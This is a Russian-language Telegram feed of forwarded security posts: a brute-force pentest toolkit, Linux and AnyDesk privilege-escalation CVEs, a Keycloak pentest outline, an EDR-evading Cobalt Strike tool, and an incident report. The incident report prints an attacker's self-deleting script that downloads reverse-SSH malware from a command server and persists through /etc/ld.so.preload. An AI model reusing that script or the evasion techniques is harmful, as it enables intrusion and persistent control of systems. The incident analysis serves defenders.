Forwarded from #memekatz
This media is not supported in your browser
VIEW IN TELEGRAM
Когда просят описать работу в SOC
Forwarded from GISCYBERTEAM
Lucille
Lucille — это инструмент для тестирования безопасности веб-приложений, созданный на Python. Он предлагает удобный набор инструментов, обеспечивая эффективное и практичное решение для оптимизации задач пентеста. Lucille помогает централизовать различные методы аудита и эксплуатации, упрощая процесс выявления уязвимостей.
Репозиторий:
https://github.com/jasonxtn/Lucille
Установка:
Запуск:
Lucille предоставляет комплексный набор инструментов для тестирования безопасности веб-приложений:
1. Сбор информации
- DNS Lookup + Cloudflare Detector
- Whois Lookup
- Zone Transfer
- Reverse IP Lookup
- Linkgrabber
2. Брутфорс атаки:
- WordPress Brute Force
- Joomla Brute Force
- CPanel Brute Force
- Mass Brute Force + CMS Filter
3. Инструменты эксплуатации:
- Admin Panel Finder
- MD5 Decryptor
4. Инструменты пост-эксплуатации
- Shell Checker
- SMTP Tester
- Mail List From Config
Lucille — это инструмент для тестирования безопасности веб-приложений, созданный на Python. Он предлагает удобный набор инструментов, обеспечивая эффективное и практичное решение для оптимизации задач пентеста. Lucille помогает централизовать различные методы аудита и эксплуатации, упрощая процесс выявления уязвимостей.
Репозиторий:
https://github.com/jasonxtn/Lucille
Установка:
git clone https://github.com/jasonxtn/lucille.git
cd Lucille
pip install -r requirements.txt
Запуск:
python lucille.py
Lucille предоставляет комплексный набор инструментов для тестирования безопасности веб-приложений:
1. Сбор информации
- DNS Lookup + Cloudflare Detector
- Whois Lookup
- Zone Transfer
- Reverse IP Lookup
- Linkgrabber
2. Брутфорс атаки:
- WordPress Brute Force
- Joomla Brute Force
- CPanel Brute Force
- Mass Brute Force + CMS Filter
3. Инструменты эксплуатации:
- Admin Panel Finder
- MD5 Decryptor
4. Инструменты пост-эксплуатации
- Shell Checker
- SMTP Tester
- Mail List From Config
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Proxy Bar
CVE-2024-36972
*
Два в одном !
Linux
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17
POC exploit
#Linux #lpe #container #escape
*
Два в одном !
Linux
LPE and Container Escape*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17
POC exploit
#Linux #lpe #container #escape
Forwarded from offsec notes
Keycloak pentest
Articles
Part 1 - Link
Part2 - Link
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Descriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)Csacyber
Pentesting Keycloak Part 1: Identifying Misconfiguration Using Risk Management Tools
Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
www.opennet.ru
Доступен дистрибутив OpenWrt 24.10
После более года разработки представлен значительный выпуск дистрибутива OpenWrt 24.10.0, развиваемого для сетевых устройств, таких как маршрутизаторы, коммутаторы и точки доступа. OpenWrt поддерживает 1970 устройств и предлагает систему сборки, упрощающую…
🔗Ссылка:
https://opennet.ru/62680/
https://opennet.ru/62680/
Forwarded from ESCalator
(Ex)Cobalt в контейнере 🛂
В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах.
Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории
Стало понятно, что мы обнаружили заражение внутри одного из контейнеров. Для дополнительного анализа мы получили Docker-образ, на основе которого создавался контейнер. Пример команды:
Анализ истории показал, что атакующим удалось модифицировать образ путем выполнения двух команд:
Далее в одном из слоев образа мы обнаружили самоудаляющийся sh-скрипт
Скрипт подгружал образцы ВПО с управляющего сервера в образ, а также для закрепления прописывал их в
🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами.
Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке.
IoCs:
#ir #ioc #malware
@ptescalator
В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах.
Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории
/var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. Она содержит слои контейнеров:/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExСobalt Reverse SSH
Стало понятно, что мы обнаружили заражение внутри одного из контейнеров. Для дополнительного анализа мы получили Docker-образ, на основе которого создавался контейнер. Пример команды:
docker save myimage:latest | gzip > myimage_latest.tar.gz
Анализ истории показал, что атакующим удалось модифицировать образ путем выполнения двух команд:
COPY, которая копировала файл update в образ, и команды запуска скрипта /bin/bash /update. Затем модифицированный образ был загружен в локальный Docker Registry.{
"created": "2023-08-11T01:13:12",
"created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
"created": "2023-08-11T01:13:18",
"created_by": "/bin/sh -c /bin/bash /update"
}Далее в одном из слоев образа мы обнаружили самоудаляющийся sh-скрипт
update:#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload
Скрипт подгружал образцы ВПО с управляющего сервера в образ, а также для закрепления прописывал их в
/etc/ld.so.preload./usr/lib/x86_64-linux-gnu/libssoc.so — образец ExСobalt Launcher запускает процессы /usr/bin/checks и /usr/bin/processes.🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами.
Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке.
IoCs:
leo.rpm-bin.link
mirror.dpkg-source.info
e49b72e58253f4f58f9c745757eb3ab0
3bd5560b50c751c91056bfe654f9bc70
ef587305a462161682f74d0cad139caa
#ir #ioc #malware
@ptescalator
Forwarded from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
Forwarded from 1N73LL1G3NC3
Patchwerk
Cobalt Strike BOF that finds all the Nt*system call stubs within NTDLL and overwrites the memory with clean stubs (user land hook evasion). This way we can use the NTAPIs from our implant code, and if EDR check the call stack it will have originated from NTDLL. It’s pretty much the same as the original unhook by Raph Mudge, but this way there's no need to map ntdll.dll from disk or open handles to remote processes.
Cobalt Strike BOF that finds all the Nt*system call stubs within NTDLL and overwrites the memory with clean stubs (user land hook evasion). This way we can use the NTAPIs from our implant code, and if EDR check the call stack it will have originated from NTDLL. It’s pretty much the same as the original unhook by Raph Mudge, but this way there's no need to map ntdll.dll from disk or open handles to remote processes.
• Uses HellsGate & HalosGate to call direct syscalls for NtOpenProcess, NtWriteVirtualMemory, and NtProtectVirtualMemory.
• Has custom GetModuleHandle & GetProcAddress(getSymbolAddress) written in C and ASM to evade hooks on kernel32.
• If patching table of current process, does not use NtOpenProcess. Just uses hProc = (HANDLE)-1; instead.